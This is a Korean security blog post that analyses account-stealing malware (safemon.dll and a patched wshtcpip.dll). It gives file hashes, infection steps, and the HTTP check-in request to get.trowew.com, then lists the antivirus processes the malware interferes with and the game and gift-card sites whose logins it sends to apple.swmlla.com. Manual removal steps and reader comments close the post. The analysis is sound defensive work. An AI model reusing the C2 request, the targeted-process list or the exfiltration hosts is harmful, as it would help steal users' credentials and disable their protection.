▷ version.dll + safemon.dll 파일을 이용한 계정 정보 수집 악성코드 주의 (2012.1.17)
이는 기존의 version.dll + safemon.dll 유포 방식에서 변화를 준 형태로 이전에 작성한 분석 내용을 함께 참고하시기 바랍니다.
이를 통해 최종적으로 감염시키는 실행 파일(MD5 : c752fcd1e8767802012c1aacd2effe5c)에 대하여 avast! 보안 제품에서는 Win32:FrePack [Cryp] (VirusTotal : 17/43), 안철수연구소(AhnLab) V3 보안 제품에서는 ASD.Prevention 진단명으로 진단되고 있습니다.
GET /2/get.asp?mac=1A1B ~(생략)~ 2047&ver=winxp%20Professional&avs=(V3)&os=NO. HTTP/1.1
User-Agent: Google page
Host: get.trowew.com
Cache-Control: no-cache
※ 네이버 백신(Naver Vaccine)은 체크하지 않은 상태(unknow)로 전송됩니다.
테스트에서는 AhnLab V3 보안 제품의 경우 자체 보호 기능이 활성화된 경우에도 최종 실행 파일을 진단하지 못할 경우에는 백신이 종료되는 현상이 확인되었습니다.
최종 실행 파일을 통한 감염 과정을 간단하게 살펴보면 ① "C:\WINDOWS\system32\safemon.dll" 파일을 생성하여 브라우저 도우미 개체(BHO)에 자신을 등록하며 ② 악성 wshtcpip.dll 파일을 생성하기 위한 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\2012(월일시분초).dll" 파일을 생성합니다.
③ "C:\WINDOWS\system32\wshtcpip.dll" 시스템 파일을 백업하여 "C:\WINDOWS\system32\wshtcpxp.dll" 파일을 생성하며 ④ wshtcpip.dll 시스템 파일은 "C:\WINDOWS\system32\2012(월일시분초).dll" 파일로 이름을 변경합니다.
⑤ 앞서 생성되었던 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\2012(월일시분초).dll" 파일을 "C:\WINDOWS\system32\wshtcpip.dll" 파일로 패치하여 악성 시스템 파일로 변조한 후 ⑥ "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\ahn.bat" 배치 파일을 생성하여 감염을 시킨 최종 파일과 자신(ahn.bat)을 삭제 처리합니다.
C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\20122415352.dll :: 숨김(H) 속성, 악성 wshtcpip.dll 백업 파일
- MD5 : 7e1ecab4bd463733c1d761d2bb4cdc4c
- Kaspersky : Trojan-GameThief.Win32.OnLineGames.adztc (VirusTotal : 14/43)
※ 해당 파일은 "2012(월일시분초).dll" 형태입니다.
C:\WINDOWS\system32\20122415352.dll :: wshtcpip.dll 백업 파일(정상 파일)
※ 해당 파일은 "2012(월일시분초).dll" 형태입니다.
C:\WINDOWS\system32\safemon.dll :: BHO 등록 파일
- MD5 : 7678d7d1545edf36b611aabd98d98c81
- Kaspersky : Trojan-GameThief.Win32.Magania.gken (VirusTotal : 6/43)
C:\WINDOWS\system32\wshtcpip.dll :: 변경 전 파일 크기(19,456 Bytes) / 변경 후 파일 크기(82,432 Bytes)
- MD5 : 7e1ecab4bd463733c1d761d2bb4cdc4c
- AhnLab V3 : Trojan/Win32.OnLineGames (VirusTotal : 14/43)
C:\WINDOWS\system32\wshtcpxp.dll :: wshtcpip.dll 백업 파일(정상 파일)
1. 악성 "C:\WINDOWS\system32\wshtcpip.dll" 시스템 파일
- AhnLab MyFirewall : aosrts.exe
- AhnLab V3 : MUpdate2.exe, V3LTray.exe, V3LRun.exe, V3LSvc.exe, AhnFlt2k.sys, AhnFltNt.sys, AhnRec2k.sys, AhnRecNt.sys, AhnRghNt.sys, ahnsze.sys, v3core.sys, v3engine.sys
- AhnLab SiteGuard : SgRun.exe, Sgui.exe, SgSvc.exe
- avast! : AvastUI.exe, ashUpd.exe, AvastSvc.exe, avwsc.exe
- AVG : avgupd.exe, avgwdsvc.exe, avgfrw.exe, avgrsx.exe, avgnsx.exe, avgemc.exe, avgam.exe
- Avira AntiVir : avupgsvc.exe, avscan.exe, avguard.exe, avcenter.exe, avgnt.exe
- BitDefender : bdreinit.exe, bdagent.exe, seccenter.exe, vsserv.exe, updatesrv.exe
- ESET NOD32 : ekrn.exe, egui.exe
- Kaspersky : avp.exe
- McAfee : UdaterUI.exe, Mctray.exe, shstat.exe
- MSE : msseces.exe
- Norton : Navw32.exe, ccSvcHst.exe
- 네이버 백신(Naver Vaccine) : NaverAgent.exe
- 알약(ALYac) : AYAgent.aye, AYUpdSrv.aye, AYRTSrv.aye, EstRtw.sys
해당 악성 시스템 파일은 국내외 유명 보안 제품의 프로세스를 감시하여 정상적인 동작을 방해하는 기능이 포함되어 있는 것을 확인할 수 있습니다.
2. "C:\WINDOWS\system32\safemon.dll" 파일 기능
safemon.dll 악성 파일은 safemon Module 파일로 등록되어 있으며, 감염시 브라우저 도우미 개체(BHO)에 자신을 등록합니다.
이 과정에서 감염 전 사용자 PC에 등록된 BHO 정보가 존재할 경우 일괄적으로 삭제 처리하여 감염 후에는 자신만 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Browser Helper Objects" 레지스트리 값에 추가되는 동작을 확인할 수 있습니다.
이름 : IEHlprObj Class
유형 : 브라우저 도우미 개체
CLSID : {D36F9CA2-788F-42DE-A627-9E6EF40D8475}
파일 : C:\WINDOWS\system32\safemon.dll
※ AhnLab V3 보안 제품에서는 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}" 값에 대하여 Suspicious BHO 진단명으로 진단되고 있습니다.
이를 통해 safemon.dll 파일은 Internet Explorer 웹 브라우저가 실행될 경우 iexplore.exe 프로세스에 자신을 추가하여 다음과 같은 온라인 문화 상품권, 아이템 거래, 온라인 게임 사이트에 접속시 계정 정보를 수집하여 외부에 전송하는 동작을 합니다.
- happymoney.co.kr
- teencash.co.kr
- cultureland.co.kr
- booknlife.com
- capogames.net
- dragonnest.nexon.com
- elsword.nexon.com
- clubaudition.ndolfin.com
- netmarble.net
- itemmania.com
- itembay.com
- pmang.com
- aion.plaync.jp
- plaync.co.kr
- maplestory.nexon.com
- hangame.com
- fifaonline.pmang.com
- df.nexon.com
- baram.nexon.com
실제 틴캐시(TeenCash)에 접속하여 로그인을 시도할 경우 미국(USA)에 위치한 apple.swmlla.com(70.39.81.227) 서버로 계정 아이디(ID), 비밀번호가 전송되는 것을 확인할 수 있습니다.
그러므로 해당 악성코드에 감염된 사용자는 최대한 웹 사이트 로그인 동작을 하지 않은 상태에서 다음과 같은 절차에 따라 수동으로 문제를 해결해 보시기 바랍니다.(※ 반드시 순서를 준수하시기 바라며, 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.
(1) Internet Explorer 웹 브라우저를 실행하여 추가 기능 관리에 등록된 "IEHlprObj Class" 브라우저 도우미 개체(BHO) 항목을 선택하여 "사용 안 함"으로 변경하시기 바랍니다.(※ 변경 후에는 Internet Explorer 웹 브라우저를 종료하시기 바랍니다.)
(2) "C:\WINDOWS\system32\safemon.dll" 파일 확장자명을 변경하시기 바랍니다.(※ 예시 : safemon.dll-malware)
(3) 레지스트리 편집기(regedit)를 실행하여 다음의 레지스트리 값을 삭제하시기 바랍니다.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_ID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D36F9CA1-788F-42DE-A627-9E6EF40D8475}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D36F9CA8-788F-42DE-A627-9E6EF40D8475}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}
(4) "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\2012(월일시분초).dll" 파일을 삭제하시기 바랍니다.
(5) "C:\WINDOWS\system32\wshtcpip.dll" 파일 확장자명을 변경하시기 바랍니다.(※ 예시 : wshtcpip.dll-malware)
악성 wshtcpip.dll 파일의 확장자명을 변경한 후에는 윈도우 파일 보호(WFP) 기능을 통해 자동으로 wshtcpip.dll 파일이 복원되므로, Windows 탐색기 창을 종료한 후 다시 실행하여 해당 파일(wshtcpip.dll)이 생성되었는지 확인하시기 바랍니다.
만약 wshtcpip.dll 시스템 파일이 복원되지 않은 상태에서 시스템 재부팅을 할 경우 블루 스크린(BSoD) 발생 및 무한 재부팅으로 인해 시스템에 치명적 문제가 발생할 수 있습니다.
(6) 시스템 재부팅 후 다음의 파일을 찾아 수동으로 삭제하시기 바랍니다.
- C:\WINDOWS\system32\2012(월일시분초).dll
- C:\WINDOWS\system32\safemon.dll-malware
- C:\WINDOWS\system32\wshtcpip.dll-malware
- C:\WINDOWS\system32\wshtcpxp.dll
모든 절차가 완료된 후에는 반드시 유명 보안 제품을 이용하여 최신 업데이트를 한 후 정밀 검사를 통해 추가적인 악성 파일이 남아있는지 확인하시기 바랍니다.
해당 악성코드에 감염된 사용자는 자신의 PC가 Windows 보안 업데이트 미적용, Adobe Flash Player 구 버전 사용, Oracle JRE 구 버전 사용으로 인한 문제로 감염이 된 것이므로 반드시 최신 업데이트를 통해 보안 패치를 하시고 인터넷을 이용하시기 바랍니다.
ws2help.dll 감염 치료 후에도 상황 호전이 없어 고민하던 차에 이 포스팅을 보게 되었습니다. 현재 컴퓨터에 깔려있는 백신이 모두 먹통이 되어 AOS 로 서치를 하고 치료를 하였는데, 수동적인 후처리가 필요합니까? (본문에 방법이 제시되어있다면 본문 위치를 짚어주시면 감사하겠습니다...)
wshtcpip.dllx 이라는 파일도 발견되었습니다.
wshtcpip.dllx로 표시된걸 보니 악성 파일로 보이며 삭제 처리를 하시기 바랍니다.
그리고 절차에 따라 하나씩 점검을 제거하지 않은 부분이 있는지 체크하시기 바라며, 사용하는 백신 프로그램을 재실행하여 동작하는지 점검하여 최신 업데이트를 통해 정밀 검사를 해 보시기 바랍니다.
그리고 이런 악성코드에 대한 감염을 피하시려면 제발 보안 패치를 모두 설치하시기 바랍니다.
그러지 않으면 자신도 모르게 금새 재감염됩니다.
icesword 로 삭제를 시도하니 프로그램 실행 즉시 블루스크린이 떴습니다. 재부팅 후 이름을 바꾸고 삭제를 시도하니 삭제가 되었습니다. (해당 파일은 80kb 정도의 크기였습니다.)
안철수연구소에 질문과 해당 파일을 보낸 다음 V3 lite 를 켜니 실시간 검사와 업데이트가 모두 이루어져 있습니다. 물론 다시 정밀검사를 쭉 해봐야, 확실한 결론이 나겠지만요.
보안패치는 모두 받았습니다. 다시 이런 일이 일어나는 건 꼭 막아야겠죠.
아무쪼록 답변 감사드리며 아울러 이 포스팅이 문제 해결에 큰 도움이 되었기에 다시 한번 더 감사의 말씀을 드립니다.
safemon.dll 이없는데 어떻게하죠..
이 분석글은 1년 전 내용이며, 파일명은 변할 수 있습니다.